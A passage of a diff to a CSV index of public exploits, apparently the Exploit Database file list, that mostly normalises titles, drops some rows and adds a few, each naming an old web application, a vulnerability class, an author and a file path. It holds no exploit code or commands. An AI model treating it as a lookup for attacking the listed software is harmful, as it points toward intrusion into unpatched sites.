-5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' Parameter SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' Parameter SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps,0 5293,platforms/php/webapps/5293.pl,"XLPortal 2.2.4 - 'Search' SQL Injection",2008-03-21,cOndemned,php,webapps,0 5294,platforms/php/webapps/5294.txt,"Joomla! Component custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 -5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection",2008-03-22,Inphex,php,webapps,0 +5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - 'login.php' Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 -5297,platforms/php/webapps/5297.txt,"Joomla! Component rekry 1.0.0 - (op_id) SQL Injection",2008-03-23,Sniper456,php,webapps,0 -5298,platforms/php/webapps/5298.py,"destar 0.2.2-5 - Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 +5297,platforms/php/webapps/5297.txt,"Joomla! Component rekry 1.0.0 - 'op_id' Parameter SQL Injection",2008-03-23,Sniper456,php,webapps,0 +5298,platforms/php/webapps/5298.py,"Destar 0.2.2-5 - Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 5299,platforms/php/webapps/5299.txt,"Joomla! Component d3000 1.0.0 - SQL Injection",2008-03-23,S@BUN,php,webapps,0 5300,platforms/php/webapps/5300.txt,"Joomla! Component Cinema 1.0 - SQL Injection",2008-03-23,S@BUN,php,webapps,0 5301,platforms/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,php,webapps,0 5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 - 'index.php' Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 -5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin",2008-03-24,nonroot,php,webapps,0 +5305,platforms/php/webapps/5305.py,"Destar 0.2.2-5 - Arbitrary Add Admin",2008-03-24,nonroot,php,webapps,0 5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps,0 -5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Security Vulnerabilities",2008-03-25,DSecRG,php,webapps,0 -5310,platforms/php/webapps/5310.txt,"Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection",2008-03-25,cO2,php,webapps,0 +5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - Local File Inclusion / Cross-Site Scripting",2008-03-25,DSecRG,php,webapps,0 +5310,platforms/php/webapps/5310.txt,"Joomla! Component Alphacontent 2.5.8 - 'id' Parameter SQL Injection",2008-03-25,cO2,php,webapps,0 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - SQL Injection",2008-03-25,girex,php,webapps,0 -5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0 +5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - 'mod.php' Local File Inclusion",2008-03-25,girex,php,webapps,0 5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0 -5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - (album) SQL Injection",2008-03-28,parad0x,php,webapps,0 +5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - 'album' Parameter SQL Injection",2008-03-28,parad0x,php,webapps,0 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - 'user.php' Security Code Bypass / Add Administrator",2008-03-28,NTOS-Team,php,webapps,0 -5322,platforms/php/webapps/5322.txt,"Smoothflash - 'admin_view_image.php cid' SQL Injection",2008-03-30,S@BUN,php,webapps,0 +5322,platforms/php/webapps/5322.txt,"Smoothflash - 'cid' Parameter SQL Injection",2008-03-30,S@BUN,php,webapps,0 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,php,webapps,0 5324,platforms/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 -5325,platforms/php/webapps/5325.txt,"JShop 1.x < 2.x - (page.php xPage) Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 -5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - (dl_id) SQL Injection",2008-03-31,BL4CK,php,webapps,0 -5328,platforms/php/webapps/5328.txt,"PHPSpamManager 0.53b - (body.php) Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 -5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen - SQL Injection",2008-03-31,anonymous,php,webapps,0 -5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 -5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 -5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 -5335,platforms/php/webapps/5335.txt,"Mambo Component 'com_ahsshop' 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0 -5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - Password Retrieve SQL Injection",2008-04-01,girex,php,webapps,0 -5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,php,webapps,0 +5325,platforms/php/webapps/5325.txt,"JShop 1.x < 2.x - 'xPage' Parameter Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 +5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - 'dl_id' Parameter SQL Injection",2008-03-31,BL4CK,php,webapps,0 +5328,platforms/php/webapps/5328.txt,"PHPSpamManager 0.53b - 'body.php' Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 +5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen 2.0.2 - SQL Injection",2008-03-31,anonymous,php,webapps,0 +5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' Parameter SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 +5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps,0 +5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 +5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0 +5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0 +5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection",2008-04-01,Stack,php,webapps,0 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 @@ -18521,7 +18521,7 @@ id,file,description,date,author,platform,type,port 5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 -5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - (view.php id) SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 +5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 @@ -18584,7 +18584,7 @@ id,file,description,date,author,platform,type,port 5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php?catagorie' SQL Injection",2008-04-27,ProgenTR,php,webapps,0 5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php sid' SQL Injection",2008-04-27,cO2,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 -5512,platforms/php/webapps/5512.pl,"Joomla! Component com_alphacontent - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 +5512,platforms/php/webapps/5512.pl,"Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0 @@ -25524,7 +25524,7 @@ id,file,description,date,author,platform,type,port 20762,platforms/php/webapps/20762.php,"webpa 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 -40423,platforms/php/webapps/40423.txt,"Joomla! Component 'com_eventbooking' 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 +40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro - Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20788,platforms/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 @@ -25932,7 +25932,6 @@ id,file,description,date,author,platform,type,port 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22267,platforms/php/webapps/22267.php,"PHPBB2 - Page_Header.php SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - links.php Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 -22276,platforms/php/webapps/22276.txt,"Nuked-klaN 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0 22277,platforms/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0 @@ -26437,7 +26436,6 @@ id,file,description,date,author,platform,type,port 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 -23666,platforms/php/webapps/23666.txt,"JShop E-Commerce Suite - xSearch Cross-Site Scripting",2004-02-09,"David Sopas Ferreira",php,webapps,0 23669,platforms/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x 'Reviews' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 23670,platforms/php/webapps/23670.pl,"PHP-Nuke 6.x/7.x - Public Message SQL Injection",2004-02-09,"Janek Vind",php,webapps,0 23673,platforms/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,php,webapps,0 @@ -26800,7 +26798,6 @@ id,file,description,date,author,platform,type,port 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0 24392,platforms/php/webapps/24392.php,"Mantis 0.x - New Account Signup Mass Emailing",2004-08-21,"Jose Antonio",php,webapps,0 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 -24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - 'page.php' Cross-Site Scripting",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 - News.mdb Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 24399,platforms/php/webapps/24399.txt,"PhotoADay - Pad_selected Parameter Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 @@ -27131,7 +27128,6 @@ id,file,description,date,author,platform,type,port 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - accountsettings_add.html accountid Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 -25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 - product.php Cross-Site Scripting",2005-01-31,SmOk3,php,webapps,0 25074,platforms/php/webapps/25074.txt,"XOOPS Module module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps,0 25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce - Mensresp.asp Cross-Site Scripting",2005-02-02,Yani-ari,asp,webapps,0 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI redirection",2005-02-07,"Morning Wood",asp,webapps,0 @@ -28038,7 +28034,7 @@ id,file,description,date,author,platform,type,port 26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - Printfaq.php Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - 'artid' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps,0 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 @@ -28083,8 +28079,8 @@ id,file,description,date,author,platform,type,port 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusion",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0 -26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26389,platforms/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - link_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26389,platforms/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - 'link_id' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26390,platforms/php/webapps/26390.txt,"saPHP Lesson - add.php forumid Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26391,platforms/php/webapps/26391.html,"SiteTurn Domain Manager Pro - Admin Panel Cross-Site Scripting",2005-10-24,"farhad koosha",php,webapps,0 26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x - queryframe.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 @@ -28698,7 +28694,6 @@ id,file,description,date,author,platform,type,port 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - modules.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 -27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 - 'index.php' Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 27152,platforms/php/webapps/27152.txt,"BrowserCRM - results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 @@ -29167,7 +29162,7 @@ id,file,description,date,author,platform,type,port 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 -27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443 +27776,platforms/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 @@ -30088,9 +30083,6 @@ id,file,description,date,author,platform,type,port 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 -29056,platforms/php/webapps/29056.txt,"Eggblog 3.1 - admin/comments.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 -29057,platforms/php/webapps/29057.txt,"Eggblog 3.1 - admin/users.php add Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - db_operations.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - querywindow.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 @@ -31200,14 +31192,12 @@ id,file,description,date,author,platform,type,port 30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 -30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 - rss.php Cross-Site Scripting",2007-11-12,"Mesut Timur",php,webapps,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 -30769,platforms/php/webapps/30769.txt,"Nuked-klaN 1.7.5 - File Parameter News Module Cross-Site Scripting",2007-11-15,Bl@ckM@mba,php,webapps,0 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 @@ -31699,12 +31689,7 @@ id,file,description,date,author,platform,type,port 31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0 31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0 31555,platforms/php/webapps/31555.txt,"Simple Machines Forum 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0 -31556,platforms/php/webapps/31556.txt,"Cuteflow Bin 1.5 - pages/showtemplates.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 -31557,platforms/php/webapps/31557.txt,"Cuteflow Bin 1.5 - pages/editmailinglist_step1.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 -31558,platforms/php/webapps/31558.txt,"Cuteflow Bin 1.5 - pages/showcirculation.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 -31559,platforms/php/webapps/31559.txt,"Cuteflow Bin 1.5 - pages/edittemplate_step2.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 -31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 -31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 +40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0 40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 @@ -31810,7 +31795,6 @@ id,file,description,date,author,platform,type,port 31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting",2008-04-28,"Khashayar Fereidani",php,webapps,0 31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 -31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'Username' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 @@ -31863,7 +31847,6 @@ id,file,description,date,author,platform,type,port 31782,platforms/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31784,platforms/php/webapps/31784.txt,"phpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting",2008-05-13,"Brad Antoniewicz",asp,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 